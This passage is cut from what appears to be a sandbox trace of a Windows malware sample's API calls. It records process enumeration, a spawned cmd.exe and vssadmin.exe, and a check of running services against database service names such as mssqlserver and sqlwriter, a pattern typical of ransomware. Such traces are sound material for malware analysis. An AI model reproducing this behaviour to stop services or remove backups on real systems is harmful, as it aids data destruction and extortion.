cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.725] lstrlenW (lpString="svchost.exe") returned 11 [0219.725] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0219.726] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0219.726] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0219.727] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0219.727] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.739] lstrlenW (lpString="svchost.exe") returned 11 [0219.739] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0219.741] lstrlenW (lpString="dwm.exe") returned 7 [0219.741] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.742] lstrlenW (lpString="svchost.exe") returned 11 [0219.742] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.743] lstrlenW (lpString="svchost.exe") returned 11 [0219.743] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.744] lstrlenW (lpString="svchost.exe") returned 11 [0219.744] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.745] lstrlenW (lpString="svchost.exe") returned 11 [0219.745] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.746] lstrlenW (lpString="svchost.exe") returned 11 [0219.746] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.747] lstrlenW (lpString="svchost.exe") returned 11 [0219.747] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.748] lstrlenW (lpString="svchost.exe") returned 11 [0219.748] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.749] lstrlenW (lpString="svchost.exe") returned 11 [0219.749] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.750] lstrlenW (lpString="svchost.exe") returned 11 [0219.750] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0219.751] lstrlenW (lpString="spoolsv.exe") returned 11 [0219.751] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.864] lstrlenW (lpString="svchost.exe") returned 11 [0219.865] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.866] lstrlenW (lpString="svchost.exe") returned 11 [0219.866] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0219.867] lstrlenW (lpString="audiodg.exe") returned 11 [0219.867] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0219.868] lstrlenW (lpString="sihost.exe") returned 10 [0219.868] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.868] lstrlenW (lpString="svchost.exe") returned 11 [0219.868] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0219.869] lstrlenW (lpString="taskhostw.exe") returned 13 [0219.869] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0219.870] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0219.870] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0219.871] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0219.871] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.872] lstrlenW (lpString="explorer.exe") returned 12 [0219.872] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0219.873] lstrlenW (lpString="Memory Compression") returned 18 [0219.873] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0219.874] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0219.874] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0219.875] lstrlenW (lpString="SearchUI.exe") returned 12 [0219.875] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0219.876] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0219.876] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.876] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0219.876] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0219.877] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0219.878] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0219.878] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0219.878] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0219.879] lstrlenW (lpString="conhost.exe") returned 11 [0219.879] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0219.880] lstrlenW (lpString="roof competitive.exe") returned 20 [0219.880] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0219.881] lstrlenW (lpString="trustees.exe") returned 12 [0219.881] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0219.881] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0219.882] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0219.882] lstrlenW (lpString="isbn.exe") returned 8 [0219.882] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0219.883] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0219.883] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0219.884] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0219.884] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0219.885] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0219.885] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0219.885] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0219.885] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0219.886] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0219.886] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0219.887] lstrlenW (lpString="playstation iraq.exe") returned 20 [0219.887] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0219.888] lstrlenW (lpString="harbor.exe") returned 10 [0219.888] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0219.888] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0219.888] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0219.889] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0219.889] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0219.890] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0219.890] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0219.891] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0219.891] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0219.891] lstrlenW (lpString="larent.exe") returned 10 [0219.891] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0219.903] lstrlenW (lpString="stereo.exe") returned 10 [0219.903] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0219.904] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0219.904] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0219.905] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0219.905] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0219.905] lstrlenW (lpString="state.exe") returned 9 [0219.906] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0219.906] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0219.906] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.907] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0219.907] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0219.919] lstrlenW (lpString="taskhostw.exe") returned 13 [0219.919] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0219.920] lstrlenW (lpString="sppsvc.exe") returned 10 [0219.920] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.921] lstrlenW (lpString="svchost.exe") returned 11 [0219.921] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0219.922] lstrlenW (lpString="Pg.exe") returned 6 [0219.922] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0219.923] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0219.923] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0219.923] lstrlenW (lpString="conhost.exe") returned 11 [0219.923] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0219.924] lstrlenW (lpString="cmd.exe") returned 7 [0219.924] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0219.925] lstrlenW (lpString="conhost.exe") returned 11 [0219.925] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0219.926] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0219.926] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xef4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0219.927] lstrlenW (lpString="conhost.exe") returned 11 [0219.927] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0219.927] lstrlenW (lpString="vssadmin.exe") returned 12 [0219.928] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0219.928] CloseHandle (hObject=0x430) returned 1 [0219.928] Sleep (dwMilliseconds=0x1f4) [0220.439] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236b8a0 [0220.440] EnumServicesStatusExW (in: hSCManager=0x236b8a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0220.440] GetLastError () returned 0xea [0220.440] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x201e) returned 0x2372d70 [0220.440] EnumServicesStatusExW (in: hSCManager=0x236b8a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x2372d70, cbBufSize=0x201e, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x2372d70, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0220.441] CloseServiceHandle (hSCObject=0x236b8a0) returned 1 [0220.441] lstrlenW (lpString="Appinfo") returned 7 [0220.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0220.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0220.441] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0220.441] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0220.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0220.441] lstrlenW (lpString="AppXSvc") returned 7 [0220.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0220.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0220.442] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0220.442] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") 